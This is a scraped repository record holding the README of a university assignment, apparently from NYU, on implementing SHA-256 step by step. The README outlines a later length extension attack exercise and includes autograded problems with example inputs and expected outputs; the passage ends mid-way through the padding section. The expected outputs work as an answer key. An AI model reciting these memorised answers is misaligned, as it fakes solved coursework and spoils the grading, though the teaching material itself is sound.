{"data": [{"name": "oconnor663/sha256_project", "link": "https://github.com/oconnor663/sha256_project", "tags": [], "stars": 516, "description": "developed for NYU Tandon's Applied Cryptography course", "lang": "Python", "repo_lang": "", "readme": "# The SHA-256 Project\n\n> This project was originally assigned in NYU Tandon's CS-GY 6903 Applied\nCryptography course, Fall 2021. Here's the [original course\nrepo](https://github.com/oconnor663/applied_crypto_2021_fall) with all the\nother problem sets.\n\nIn this project we're going to implement SHA-256 ourselves, and then we'll use\nour implementation to demonstrate a \"length extension attack\". To get a sense\nof scale, take a look at the [SHA-256 pseudocode on\nWikipedia](https://en.wikipedia.org/wiki/SHA-2#Pseudocode). That pseudocode\nwill be one of our references, and there will be several direct quotes from it\nbelow. The [animations in this video](https://youtu.be/f9EbD6iY9zI) might also\nhelp you get a big-picture sense of what the algorithm is doing.\n\nImplementing that pseudocode takes less than a hundred lines of Python, which\nmight not seem like a lot. But there are lots of little details in those lines,\nand the nature of the \"avalanche effect\" is such that a tiny mistake will\ntotally mess up your output, usually without giving you any useful feedback\nabout what you did wrong. So we'll move slowly, piece by piece, making sure to\ntest each piece before we move on to the next. Read and reread each problem\ncarefully, *two or three times through,* and then follow the instructions\n*exactly* as you write your code. If the instructions are unclear, ask for help\nand avoid the temptation to guess. Mistakes will be difficult to debug, which\nmakes this project challenging.\n\nSo...what's the point of such a challenging project? If we almost never\nimplement hash functions ourselves in the real world, why are we going to spend\nour precious time on it now? Two reasons:\n\nConcretely, as long as SHA-2 remains widely used, length extension attacks will\nremain a common pitfall. You need to know about them to use SHA-2 safely, and\nto help others use it safely. As with most attacks, the best way to understand\nthe length extension attack is to do it yourself, which means we need to get\nour hands on the inner workings of SHA-2.\n\nMore broadly, there are just so many black boxes in cryptography that we almost\nnever look inside, especially our block ciphers, stream ciphers, and hash\nfunctions. No one has enough time to learn the details of all of them, not even\nprofessional cryptographers. But these algorithms are not magic, and this class\nwould be doing you a disservice if we never opened up any black boxes. Our goal\nisn't to memorize all the details, but to build up the sort of practical\nintuition that can only come from having seen the details before. And I want\nyou to come away from this class with the confidence that you can handle this\nlevel of detail for any algorithm, if and when you need to.\n\nSo this is it. This is where we're going to open one of the black boxes and get\nall the way to the bottom of it. 
This is SHA-256.\n\n## Contents\n\n* [Workflow](#workflow)\n* [Example input](#example-input)\n* [Example output](#example-output)\n* [Building blocks](#building-blocks)\n * [Problem 1: addition modulo 232](#problem-1-addition-modulo-232)\n * [Problem 2: bitwise right rotation](#problem-2-bitwise-right-rotation)\n* [The Message Schedule](#the-message-schedule)\n * [Problem 3: `little_sigma0()`](#problem-3-little_sigma0)\n * [Problem 4: `little_sigma1()`](#problem-4-little_sigma1)\n * [Problem 5: the message schedule](#problem-5-the-message-schedule)\n* [The Round Function](#the-round-function)\n * [Problem 6: `big_sigma0()`](#problem-6-big_sigma0)\n * [Problem 7: `big_sigma1()`](#problem-7-big_sigma1)\n * [Problem 8: `choice()`](#problem-8-choice)\n * [Problem 9: `majority()`](#problem-9-majority)\n * [Problem 10: the round function](#problem-10-the-round-function)\n* [The Compression Function](#the-compression-function)\n * [Problem 11: the compression function](#problem-11-the-compression-function)\n* [Padding](#padding)\n * [Problem 12: padding](#problem-12-padding)\n* [The Hash Function](#the-hash-function)\n * [Problem 13: the hash function](#problem-13-the-hash-function)\n* [The Length Extension Attack](#the-length-extension-attack)\n * [Problem 14: modeling the extended input](#problem-14-modeling-the-extended-input)\n * [Problem 15: recovering the state](#problem-15-recovering-the-state)\n * [Problem 16: the length extension attack](#problem-16-the-length-extension-attack)\n* [Conclusion](#conclusion)\n\n## Workflow\n\nThis project was originally assigned in NYU Tandon's CS-GY 6903 Applied\nCryptography course. It's intended to be JSON-in-JSON-out and autograded. A\nsimplified [`grade.py`](grade.py) script is provided in this repo, but if you\nprefer you can also just visually compare the output of your solution to the\nexample output provided. The original class was taught in Python, and some of\nthe problems below include example Python code, but feel free to code in\nwhatever language you like. Example solutions are provided in both\n[Python](solution_py) and [Rust](solution_rs).\n\nHere's a bare minimum example of parsing JSON input and producing JSON output\nusing Python:\n\n```python\nimport json\nimport sys\n\ninputs = json.load(sys.stdin)\noutputs = {}\n\noutputs[\"problem1\"] = [\"your\", \"answer\", \"here\"]\n\njson.dump(outputs, sys.stdout)\n```\n\nTo run that directly with [`example_input.json`](example_input.json), you'd\nsave it to a file like `my_solution.py` and then run this in the terminal:\n\n```\n$ python3 my_solution.py < example_input.json\n{\"problem1\": [\"your\", \"answer\", \"here\"]}\n```\n\nTo grade it, you'd run this in the terminal:\n\n```\n$ ./grade.py python3 my_solution.py\nproblem1 incorrect\nrandomized input:\n [[1, 2], [4294967295, 1], [3148047433, 2995627551]]\nexpected output:\n [3, 0, 1848707688]\nyour output:\n ['your', 'answer', 'here']\nproblem2 missing\nproblem3 missing\nproblem4 missing\nproblem5 missing\nproblem6 missing\nproblem7 missing\nproblem8 missing\nproblem9 missing\nproblem10 missing\nproblem11 missing\nproblem12 missing\nproblem13 missing\nproblem14 missing\nproblem15 missing\nproblem16 missing\n```\n\nAs you can see there, the grading script generates random inputs every time you\nrun it. 
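\n\nFor example, a bare-bones solution skeleton that reads its inputs dynamically might look like this (just a sketch; `solve_problem1` is a hypothetical placeholder for the real logic you'll write in Problem 1):\n\n```python\nimport json\nimport sys\n\ninputs = json.load(sys.stdin)\noutputs = {}\n\ndef solve_problem1(pairs):\n    # placeholder: replace with real logic once you reach Problem 1\n    return [\"your\", \"answer\", \"here\"]\n\n# read this problem's randomized input instead of hardcoding the example values\noutputs[\"problem1\"] = solve_problem1(inputs[\"problem1\"])\n\njson.dump(outputs, sys.stdout)\n```\n\n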
So a complete solution should read input values from the JSON input\nevery time, rather than just hardcoding the example inputs.\n\nHere's a common pitfall for folks who haven't worked with JSON and stdin/stdout\nbefore: If you print anything extra to stdout (like with the regular Python\n`print()` function) that will mess up your JSON output, and the grading script\nwill give you an error message like \"Your solution isn't valid JSON.\" If you\nsee that error, make sure to comment out your print statements.\n\n## Example input\n\n```json\n{\n \"problem1\": [\n [1, 2],\n [4294967295, 1],\n [3050487260, 3710144918]\n ],\n \"problem2\": [\n [2, 1],\n [1, 1],\n [2919882184, 31]\n ],\n \"problem3\": 1114723206,\n \"problem4\": 1232674167,\n \"problem5\": \"iguana wombat dog kangaroo llama turkey yak unicorn sheep xenoce\",\n \"problem6\": 3536071395,\n \"problem7\": 651015076,\n \"problem8\": [2749825547, 776049372, 1213590135],\n \"problem9\": [3758166654, 2821345890, 1850678816],\n \"problem10\": {\n \"state\": [\n 2739944672, 3126690193, 4191866847, 1163785745,\n 3714074692, 1172792371, 283469062, 826169706\n ],\n \"round_constant\": 961987163,\n \"schedule_word\": 3221900128\n },\n \"problem11\": {\n \"state\": [\n 2918946378, 1679978889, 1678006433, 650957219,\n 379281712, 2112907926, 1775216060, 2152648190\n ],\n \"block\": \"manatee fox unicorn octopus dog fox fox llama vulture jaguar xen\"\n },\n \"problem12\": [0, 1, 55, 56, 64, 492022654431536432],\n \"problem13\": [\n \"\",\n \"hello world\",\n \"aardvark zebra yak pig jaguar aardvark rhinoceros butte\",\n \"narwhal dog llama llama giraffe narwhal octopus dog xeno\",\n \"John Jacob Jingleheimer Schmidt! His name is my name too. Whenever we go out the people always shout there goes John Jacob Jingleheimer Schmidt! 
Nanananananana...\"\n ],\n \"problem14\": {\n \"original_input\": \"fox elephant dog\",\n \"chosen_suffix\": \"pig jaguar iguana\"\n },\n \"problem15\": \"bacb15aef84802baa0f530845013a98ee1eede664b914f8ebc2a520e69049a09\",\n \"problem16\": {\n \"original_hash\": \"27b82abe296f3ecd5174b6e6168ea683cd8ef94306d9abd9f81807f2fa587d2a\",\n \"original_len\": 41,\n \"chosen_suffix\": \"manatee jaguar zebra zebra dog\"\n }\n}\n```\n\n## Example output\n\n```json\n{\n \"problem1\": [3, 0, 2465664882],\n \"problem2\": [1, 2147483648, 1544797073],\n \"problem3\": 1345017931,\n \"problem4\": 2902922196,\n \"problem5\": [\n 1768387937, 1851859063, 1869439585, 1948279919, 1730177889, 1852268914, 1869553772, 1818324321,\n 544503154, 1801812256, 2036427552, 1970170211, 1869770272, 1936221541, 1881176165, 1852793701,\n 3002878561, 3711121932, 1520676164, 3002441970, 2935068969, 1610329529, 1904580351, 3219988740,\n 2337695268, 263015313, 2120931855, 131203777, 3818546915, 19163115, 3479924161, 2154860703,\n 1790169326, 516580487, 2414737634, 909025701, 2241053595, 1237268359, 3797503938, 1773623028,\n 2840671725, 2299292186, 1933596460, 2279513616, 514132674, 3245155609, 1753922983, 2241450350,\n 2449659630, 262239956, 773552098, 3253131632, 3863807927, 879696536, 3143654396, 3973063648,\n 509015903, 270850193, 1893431553, 719566283, 2310657204, 365781698, 3761063438, 1007484868\n ],\n \"problem6\": 3003388882,\n \"problem7\": 2194029931,\n \"problem8\": 1783753340,\n \"problem9\": 3893039714,\n \"problem10\": [\n 1724514418, 2739944672, 3126690193, 4191866847,\n 1638715774, 3714074692, 1172792371, 283469062\n ],\n \"problem11\": [\n 1251501988, 1663226031, 2877128394, 4050467288,\n 2375501075, 1434687977, 2625842981, 650253644\n ],\n \"problem12\": [\n \"80000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\",\n \"800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000008\",\n \"8000000000000001b8\",\n \"8000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c0\",\n \"80000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200\",\n \"800000000000000036a01ffa96b12980\"\n ],\n \"problem13\": [\n \"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\n \"b94d27b9934d3e08a52e52d7da7dabfac484efe37a5380ee9088f7ace2efcde9\",\n \"4b45e1bec21185865d1628a8a502eed789193a3c253a529983e4bc17fa65f32b\",\n \"99069f1eba4c874aba649c17136a253e1dd504cda936ab77cf189c2cf9eb88ff\",\n \"68b74d91364475247c10bfee2621eaa13bcabb033ed1dee58b74c05e7944489a\"\n ],\n \"problem14\": \"666f7820656c657068616e7420646f67800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000080706967206a616775617220696775616e61\",\n \"problem15\": [\n 3133871534, 4165468858, 2700423300, 1343465870,\n 3790528102, 1267814286, 3156890126, 1761909257\n ],\n \"problem16\": \"50417b93404facb1b481990a7bf6ac963b1e1ee0ccced8b2a5938caa28b52b41\"\n}\n```\n\n## Building blocks\n\nWe'll start with the smallest details at the very bottom of the box. 
As a first\nstep, we need to build a couple of math operations that Python doesn't give us\ndirectly: modular addition and bitwise right-rotation.\n\n### Problem 1: addition modulo 2^32\n\nIf you've learned a language like C or Java before, you might know that modular\naddition is what many languages do with integers by default. In these\nlanguages, integers have some fixed size, like 32 bits, and any math operation\nthat would normally give a result \u22652^32 instead \"overflows\" and\nstarts counting up from 0 again. These fixed-size integer operations are very\nefficient in hardware, so they're common in CPU instruction sets and in\nalgorithms like SHA-256. However, integers in Python have no fixed size, and\nmath operations in Python never overflow. If you want to see this in action,\nask Python for the value of 2^1,000,000. This property is lovely for\nour intuition as programmers, because it means Python integers work like the\nregular math we're used to. But alas, it's not how addition is done in SHA-256,\nso we'll need to give ourselves a helper function for this.\n\nDefine a function like `add32(x, y)`. (I'll suggest names for your functions\nthroughout this project, but you can name them whatever you like.) It should\nadd its two arguments and then take the result modulo 2^32, i.e. the\nremainder when the result is divided by 2^32. Remember that `%` is\nthe \"modulo\" or \"remainder\" operator in Python, and `**` is the exponentiation\noperator.\n\n**Input:** a list of `(x, y)` pairs\n\n**Output:** a list of results from calling `add32` on each pair\n\n### Problem 2: bitwise right rotation\n\nThe other building block we need is bitwise rotation. Most programming\nlanguages including Python provide a very similar operation called bit\n_shifting_, usually written `<<` (left shift) or `>>` (right shift). A bit\nrotation is like a bit shift, but instead of \"falling off the end\" of the number,\nthe bits rotate around to the other end. This is nice for cryptographic\nfunctions that need to do a lot of mixing, because it moves bits around without\nlosing any information. For example, consider this 32-bit number:\n\n```\n00000000000000000000000000001111\n```\n\nIf we right-*shift* that number by two places, we get:\n\n```\n00000000000000000000000000000011\n```\n\nBut if we right-*rotate* that number by two places, we get:\n\n```\n11000000000000000000000000000011\n```\n\nPython doesn't have a built-in bit rotation operator, but we can accomplish the\nsame thing by combining the results of two shifts. If you enjoy bit twiddling\npuzzles, figure out how to do this before reading further. If not, it's ok to\njust copy the following function, but make sure you take a few moments to walk\nthrough the example above and see how it does the right thing.\n\n```python\ndef rightrotate32(x, n):\n    assert x < 2 ** 32, \"x is too large. Did you use + instead of add32 somewhere?\"\n    right_part = x >> n\n    left_part = x << (32 - n)\n    return add32(left_part, right_part)\n```\n\n**Input:** a list of `(x, n)` pairs\n\n**Output:** a list of results from calling `rightrotate32` on each pair\n\nUsing these helper functions and Python's other built-in operations, we're\ngoing to do a lot of math using 32-bit integers. As a shorthand, we'll refer to\nthese integers as \"words\". A \"word\" is just another way of saying \"an integer\nof the size that we prefer to / are able to work with\". 
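\n\nSpeaking of these helper functions: if you'd like something concrete to check against, here is a minimal sketch of `add32()` next to the `rightrotate32()` function above, with a couple of sanity checks taken from the example input and output files (structure your own code however you like):\n\n```python\ndef add32(x, y):\n    # addition modulo 2^32, as described in Problem 1\n    return (x + y) % (2 ** 32)\n\ndef rightrotate32(x, n):\n    assert x < 2 ** 32, \"x is too large. Did you use + instead of add32 somewhere?\"\n    right_part = x >> n\n    left_part = x << (32 - n)\n    return add32(left_part, right_part)\n\n# sanity checks against the example values\nassert add32(4294967295, 1) == 0\nassert add32(3050487260, 3710144918) == 2465664882\nassert rightrotate32(2919882184, 31) == 1544797073\n```\n\nBack to the terminology.\n\n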
The size of a word\ndepends on context, but **in the context of SHA-256, a \"word\" means a 32-bit\nunsigned integer.**\n\n## The Message Schedule\n\nWith those two building blocks in place, we're ready to implement the first\nmajor moving part of our hash function, the \"message schedule\". Here the\n\"message\" means the hash function's input. In each round of its compression\nfunction, SHA-256 mixes in one word from the message. (Make sure you read the\ndefinition of a \"word\" above.) The \"message schedule\" defines exactly what\nthose words are and the order in which they're used.\n\nA SHA-256 message block is 64 bytes long, and a word is 4 bytes long, so one\nblock contains exactly 16 words. SHA-256 has 64 rounds, and the first 16 of\nthose rounds use those 16 message words directly. The subsequent 48 rounds mix\ndifferent message words together using a formula. We're about to implement that\nformula. First we need a couple more small helpers, which we'll call\n`little_sigma0` and `little_sigma1`.\n\n### Problem 3: `little_sigma0()`\n\nGiven a word `x`, we define `little_sigma0(x)` to be the value:\n\n```python\nrightrotate32(x, 7) ^ rightrotate32(x, 18) ^ (x >> 3)\n```\n\nImplement this function in Python. You can copy the line above if you like.\n\n**Inputs:** an integer `x`\n\n**Outputs:** the value `little_sigma0(x)`\n\nBased on [this paper](https://arxiv.org/pdf/1402.1314.pdf), I'm pretty sure the\nname \"sigma\" (Greek lowercase \u03c3 and uppercase \u03a3) refers to the \"S-boxes\" or\n\"substitution boxes\" that we're familiar with from block ciphers. See p. 57 of\n*Serious Cryptography*.\n\n### Problem 4: `little_sigma1()`\n\nSimilarly, given a word `x`, we define `little_sigma1(x)` to be the value:\n\n```python\nrightrotate32(x, 17) ^ rightrotate32(x, 19) ^ (x >> 10)\n```\n\nImplement this function in Python too. Again, you can copy the line above if\nyou like.\n\n**Inputs:** an integer `x`\n\n**Outputs:** the value `little_sigma1(x)`\n\n### Problem 5: the message schedule\n\nNow we're ready to compute the full 64-**word** message schedule array, which\nis usually called `W` (for \"words\"). As we said above, the block size of\nSHA-256 is 64 **bytes**, so for this process you start off with a 64-byte block\nof input. Convert these 64 bytes into 16 words, by converting each 4-byte group\ninto an integer using a **big-endian** conversion like\n[`int.from_bytes(..., \"big\")`](https://docs.python.org/3/library/stdtypes.html#int.from_bytes).\n(Using the wrong endianness here will be a *common mistake*.) This gives you\nthe first 16 elements of `W`. For each of the remaining 48 elements \u2014 that is,\nfor each index from 16 to 63 \u2014 use the following formula:\n\n```\nW[i] := W[i-16] + little_sigma0(W[i-15]) + W[i-7] + little_sigma1(W[i-2])\n```\n\nNote that in this case the formula is pseudocode, not Python. The `:=` symbol\nmeans \"is defined to be\", similar to `=` in Python. Importantly, the `+` symbol\nin SHA-256 pseudocode does *not* mean Python's `+`, but rather the `add32()`\nfunction that we defined back in Problem 1. (Implementing pseudocode using\nregular Python addition rather than `add32` will be a *common mistake*\nthroughout this project.) Depending on how you structure your Python code, you\nmight also want to use the\n[`.append()`](https://docs.python.org/3/tutorial/datastructures.html) method on\nlists.\n\nDefine a function like `message_schedule(block)` which takes a 64-byte block\nand returns a 64-word list, according to the formula described above. 
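\n\nOne possible shape for that function is sketched below (assuming the `add32()`, `little_sigma0()`, and `little_sigma1()` helpers from Problems 1, 3, and 4):\n\n```python\ndef message_schedule(block):\n    assert len(block) == 64\n    W = []\n    # the first 16 words come straight from the block, big-endian\n    for i in range(16):\n        W.append(int.from_bytes(block[4 * i : 4 * i + 4], \"big\"))\n    # the remaining 48 words mix earlier words together, using add32 for every +\n    for i in range(16, 64):\n        new_word = add32(\n            add32(W[i - 16], little_sigma0(W[i - 15])),\n            add32(W[i - 7], little_sigma1(W[i - 2])),\n        )\n        W.append(new_word)\n    return W\n```\n\n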
Your\ninput for this problem is an ASCII string of length 64. Convert it to bytes,\nand use your `message_schedule()` function to construct message schedule for\nthat block. Your output should be the resulting list.\n\n**Input:** an ASCII string of length 64, which represents a block of input for the compression function\n\n**Output:** the resulting message schedule, a list of 64 words (integers)\n\nAs you work on this part of the algorithm, it might be helpful or interesting\nto compare notes with how different sources describe it. Here's how *Serious\nCryptography* describes it, on p. 119:\n\n\"message\n\nAnd here's how [the pseudocode on\nWikipedia](https://en.wikipedia.org/wiki/SHA-2#Pseudocode) describes it:\n\n```\ncreate a 64-entry message schedule array w[0..63] of 32-bit words\n(The initial values in w[0..63] don't matter, so many implementations zero them here)\ncopy chunk into first 16 words w[0..15] of the message schedule array\n\nExtend the first 16 words into the remaining 48 words w[16..63] of the message schedule array:\nfor i from 16 to 63\n s0 := (w[i-15] rightrotate 7) xor (w[i-15] rightrotate 18) xor (w[i-15] rightshift 3)\n s1 := (w[i- 2] rightrotate 17) xor (w[i- 2] rightrotate 19) xor (w[i- 2] rightshift 10)\n w[i] := w[i-16] + s0 + w[i-7] + s1\n```\n\nAnd finally, here's how it's described in the official standard that defines\nSHA-256, p. 22 of [FIPS\n180-4](https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.180-4.pdf):\n\n\"message\n\nThese are all different ways of describing the same message schedule.\n\nOnce you've got the message schedule implemented correctly, you've reached the\nfirst major milestone of the project. Well done! We'll need to set it aside for\na moment to focus on another big moving part, but don't worry: we'll come back\nand make use of it before long.\n\n## The Round Function\n\nAs we said above, the SHA-256 compression function does 64 rounds of mixing.\nWe're about to implement the operation that's done for each round. To get\nstarted, we're going to need four more small helper functions:\n\n### Problem 6: `big_sigma0()`\n\nGiven a word `x`, we define `big_sigma0(x)` to be the value:\n\n```python\nrightrotate32(x, 2) ^ rightrotate32(x, 13) ^ rightrotate32(x, 22)\n```\n\nImplement this function in Python. You can copy the line above if you like.\n\n**Inputs:** an integer `x`\n\n**Outputs:** the value `big_sigma0(x)`\n\n### Problem 7: `big_sigma1()`\n\nGiven a word `x`, we define `big_sigma1(x)` to be the value:\n\n```python\nrightrotate32(x, 6) ^ rightrotate32(x, 11) ^ rightrotate32(x, 25)\n```\n\nImplement this function in Python too. Again, you can copy the line above if\nyou like.\n\n**Inputs:** an integer `x`\n\n**Outputs:** the value `big_sigma1(x)`\n\n### Problem 8: `choice()`\n\nGiven three words, `x`, `y`, and `z`, we define `choice(x, y, z)` to be the value:\n\n```python\n(x & y) ^ (~x & z)\n```\n\nImplement this function in Python too. Again, you can copy the line above if\nyou like.\n\nNote that the `~` symbol in Python means \"bitwise-not\", i.e. turn all the\n0-bits into 1's and all the 1-bits into 0's. This isn't an operation we need\nvery often, but it's nice that it's built-in. The fact that Python integers are\nboth signed and also variably-sized means that the behavior of `~` is subtler\nthan it might seem at first glance. Because of the rules of [\"two's complement\"\nsigned arithmetic](https://en.wikipedia.org/wiki/Two%27s_complement), it tends\nto give us negative numbers. 
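\n\nFor instance, in the Python REPL (a quick illustration with small made-up values; your solution doesn't need any of this):\n\n```\n>>> x = 0b1100\n>>> ~x\n-13\n>>> z = 0b1010\n>>> (~x) & z          # negative x, but the AND with a non-negative word still works out\n2\n>>> (x ^ 0xFFFFFFFF) & z   # the \"32-bit\" version of bitwise-not gives the same answer\n2\n```\n\n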
Luckily, all the little details work out in the\nend, and we can use `~` here without worrying about it. You can just trust me\non that and copy the line of code above, or you can explore how `~` works\nin Python as an exercise.\n\n**Inputs:** a list of three integers, `[x, y, z]`\n\n**Outputs:** the value `choice(x, y, z)`\n\nBefore you move on from this function, take a moment to stare at it. Can you\ntell why it's called \"choice\"?\n\n### Problem 9: `majority()`\n\nThe last helper for the round function. Given three words, `x`, `y`, and `z`,\nwe define `majority(x, y, z)` to be the value:\n\n```python\n(x & y) ^ (x & z) ^ (y & z)\n```\n\nImplement this function in Python too. Again, you can copy the line above if\nyou like.\n\n**Inputs:** a list of three integers, `[x, y, z]`\n\n**Outputs:** the value `majority(x, y, z)`\n\nSame follow-up question as above: Can you tell why this function is called\n\"majority\"? This one's a little trickier. Three bits put together have\n23 = 8 possible values, and the easiest way to see this one is to\njust make a table and calculate what happens in each case.\n\n### Problem 10: the round function\n\nAlright, we're ready to implement the next big moving part of SHA-256, the\nround function. The round function takes three arguments. The most important of\nthese is the **state**, a list of 8 words. Recall the diagram of the\nMerkle\u2013Damg\u00e5rd construction from p. 112 of *Serious Cryptography*:\n\n\"Merkle\u2013Damg\u00e5rd\n\nThe values H0, H1, and H2 represent this\n8-word state as it's transformed by each call to the compression function. At\nthis point we're working on the round function, which is _inside_ the\ncompression function (i.e. inside the trapezoids in that diagram), but it's the\nsame state that we're talking about.\n\nThe other two inputs to the round function are the **round constant** and the\n**schedule word**, each of which is one word (an integer). As you might guess,\nthe schedule word is ultimately going to come from the message schedule, which\nwe implemented in Problem 5, but for now we'll just take it as an\nargument.\n\nDefine a function like `round(state, round_constant, schedule_word)`. This\nfunction starts by computing several values, using the helper functions defined\nabove:\n\n```\nch := choice(state[4], state[5], state[6])\ntemp1 := state[7] + big_sigma1(state[4]) + ch + round_constant + schedule_word\nmaj := majority(state[0], state[1], state[2])\ntemp2 := big_sigma0(state[0]) + maj\n```\n\nAs in Problem 5, these formulas are pseudocode, and the `+` symbol means\n`add32()`. Finally, the round function assembles a new state:\n\n```\nnew_state := [\n temp1 + temp2,\n state[0],\n state[1],\n state[2],\n state[3] + temp1,\n state[4],\n state[5],\n state[6],\n]\n```\n\nThis `new_state` is the return value of `round()`.\n\nYour input for this problem is an object with three fields, `\"state\"`\ncontaining a list of 8 integers, `\"round_constant\"` containing one integer, and\n`\"schedule_word\"` containing one integer. Call your `round()` function with\nthese three arguments. Your output should be the resulting new state.\n\n**Input:** an object with three fields, `\"state\"`, `\"round_constant\"`, and `\"schedule_word\"`\n\n**Output:** a list of 8 words (integers), the new state returned by `round()`\n\nAs we did in Problem 5, we can compare how different sources describe the\nsame part of the algorithm. 
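\n\nBefore looking at those other sources, here is one possible Python rendering of the pseudocode above (just a sketch; remember that every `+` in the pseudocode means `add32()`):\n\n```python\ndef round(state, round_constant, schedule_word):\n    ch = choice(state[4], state[5], state[6])\n    temp1 = add32(\n        add32(add32(state[7], big_sigma1(state[4])), ch),\n        add32(round_constant, schedule_word),\n    )\n    maj = majority(state[0], state[1], state[2])\n    temp2 = add32(big_sigma0(state[0]), maj)\n    return [\n        add32(temp1, temp2),\n        state[0],\n        state[1],\n        state[2],\n        add32(state[3], temp1),\n        state[4],\n        state[5],\n        state[6],\n    ]\n```\n\n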
*Serious Cryptography* doesn't include the SHA-256\nround function in detail, describing it only as \"more complex than that of\nSHA-1\" on p. 119.\n\n[The pseudocode on Wikipedia](https://en.wikipedia.org/wiki/SHA-2#Pseudocode)\nuses the variables `a`, `b`, `c`, `d`, `e`, `f`, `g`, and `h` to refer to the 8\nelements of the state array. Here's how it describes the round function:\n\n```\nS1 := (e rightrotate 6) xor (e rightrotate 11) xor (e rightrotate 25)\nch := (e and f) xor ((not e) and g)\ntemp1 := h + S1 + ch + k[i] + w[i]\nS0 := (a rightrotate 2) xor (a rightrotate 13) xor (a rightrotate 22)\nmaj := (a and b) xor (a and c) xor (b and c)\ntemp2 := S0 + maj\n\nh := g\ng := f\nf := e\ne := d + temp1\nd := c\nc := b\nb := a\na := temp1 + temp2\n```\n\nP. 23 of the [FIPS\n180-4](https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.180-4.pdf) standard\ndescribes the round function using uses the same 8 variables:\n\n\"the\n\nOnce you've got the round function working, you've reached the second major\nmilestone of the project. Very well done! Most of the little details are behind\nus now, and the pieces we've built are about to start fitting together.\n\n## The Compression Function\n\n### Problem 11: the compression function\n\nFinally, we've arrived at a piece big enough that we've actually heard of it\nbefore. The compression function is the trapezoid from the Merkle\u2013Damg\u00e5rd\ndiagram above. This is where we're going to write the \"round loop\" that\nexecutes the round function 64 times, once for each of the 64 rounds of\nSHA-256.\n\nWe saw the `round_constant` argument above. We need to start by copying the\narray of values that we'll use for this argument. Paste the following into your\nPython code as a global variable:\n\n```python\nROUND_CONSTANTS = [\n 0x428a2f98, 0x71374491, 0xb5c0fbcf, 0xe9b5dba5, 0x3956c25b, 0x59f111f1, 0x923f82a4, 0xab1c5ed5,\n 0xd807aa98, 0x12835b01, 0x243185be, 0x550c7dc3, 0x72be5d74, 0x80deb1fe, 0x9bdc06a7, 0xc19bf174,\n 0xe49b69c1, 0xefbe4786, 0x0fc19dc6, 0x240ca1cc, 0x2de92c6f, 0x4a7484aa, 0x5cb0a9dc, 0x76f988da,\n 0x983e5152, 0xa831c66d, 0xb00327c8, 0xbf597fc7, 0xc6e00bf3, 0xd5a79147, 0x06ca6351, 0x14292967,\n 0x27b70a85, 0x2e1b2138, 0x4d2c6dfc, 0x53380d13, 0x650a7354, 0x766a0abb, 0x81c2c92e, 0x92722c85,\n 0xa2bfe8a1, 0xa81a664b, 0xc24b8b70, 0xc76c51a3, 0xd192e819, 0xd6990624, 0xf40e3585, 0x106aa070,\n 0x19a4c116, 0x1e376c08, 0x2748774c, 0x34b0bcb5, 0x391c0cb3, 0x4ed8aa4a, 0x5b9cca4f, 0x682e6ff3,\n 0x748f82ee, 0x78a5636f, 0x84c87814, 0x8cc70208, 0x90befffa, 0xa4506ceb, 0xbef9a3f7, 0xc67178f2,\n]\n```\n\nYou'll see the same array near the top of the [Wikipedia\npseudocode](https://en.wikipedia.org/wiki/SHA-2#Pseudocode). In effect, these\nare just some hardcoded, random-looking numbers that we add to the mix. In\nfact, they do actually come from a formula, something to do with the cube roots\nof the first 64 prime numbers. But the details of the formula don't matter to\nus. 
These are just [\"nothing-up-my-sleeve\nnumbers\"](https://en.wikipedia.org/wiki/Nothing-up-my-sleeve_number).\n\nNow, define a function like `compress(input_state, block)`, where `input_state`\nis an 8-word list, and `block` is a 64-byte block of the hash function's input.\nThis function combines the message schedule from Problem 5 with the round\nfunction from Problem 10, like this:\n\n```\nW := message_schedule(block)\n\nstate := input_state\nfor i in 0, 1, ..., 63\n state = round(state, ROUND_CONSTANTS[i], W[i])\n\nstate = [\n input_state[0] + state[0],\n input_state[1] + state[1],\n input_state[2] + state[2],\n input_state[3] + state[3],\n input_state[4] + state[4],\n input_state[5] + state[5],\n input_state[6] + state[6],\n input_state[7] + state[7],\n]\n```\n\nAs in Problem 5, these formulas are pseudocode, and the `+` symbol means\n`add32()`. The final value of `state` is the return value of `compress()`. Note\nthat the value of `input_state` gets used again at the end, so `input_state`\nand `state` do need to be two different variables.\n\nYour input for this problem is an object with two fields, `\"state\"` containing\na list of 8 integers and `\"block\"` containing an ASCII string of length 64.\nConvert the block to bytes and then call your `compress()` function with those\narguments. Your output should be the resulting new state.\n\n**Input:** an object with two fields, `\"state\"` and `\"block\"`\n\n**Output:** a list of 8 words (integers), the new state returned by `compress()`\n\nBefore you move on, think about the loop you just wrote. It's probably just two\nor three lines of code. But 64 rounds is actually quite a lot of work for the\ncomputer. This little loop, plus all the code inside of `round()`, is where the\nmagic happens. This is the mixing loop. When cryptographers study SHA-256 and\ntry to develop attacks, this little loop is what they're attacking. That makes\nthe number 64 a very careful tradeoff between speed and security. Is 64 rounds\nenough mixing to guarantee collision resistance and all the other security\nproperties? It seems to be enough today, but what about ten or twenty years\nfrom now? Will SHA-256 be able to withstand another generation of clever\nattacks and faster computers? Maybe some of you will have a hand in that\nresearch...\n\nIn any case, for now we have our secure compression function. With this\nworking, we've turned onto the home stretch. The full hash function is in\nsight.\n\n## Padding\n\n### Problem 12: padding\n\nSHA-256 takes a \"message\" of any length as input, but the compression function\nworks with 64-byte blocks at a time, so we need to pad the message to be an\nexact multiple of the block size. This is very similar to what we did with\nblock ciphers in Chapter 4 and Problem Set 3. As with block\nciphers, a naive padding scheme like \"just fill the remainder of the last block\nwith zeros\" isn't going to work. This time it's because of collision\nresistance: If two different messages looked the same after padding, then their\nhashes would be the same too, which is never supposed to happen. That means we\nneed a proper, unambiguous padding scheme.\n\nIt would be nice if we could reuse our PCKS#7 code from Problem Set 3, but alas\nSHA-256 does something different. On the bright side, because this is hashing\nand not encryption, at least we don't need to write any code for unpadding.\n\nThe SHA-256 padding scheme is originally defined in terms of bits, not bytes. 
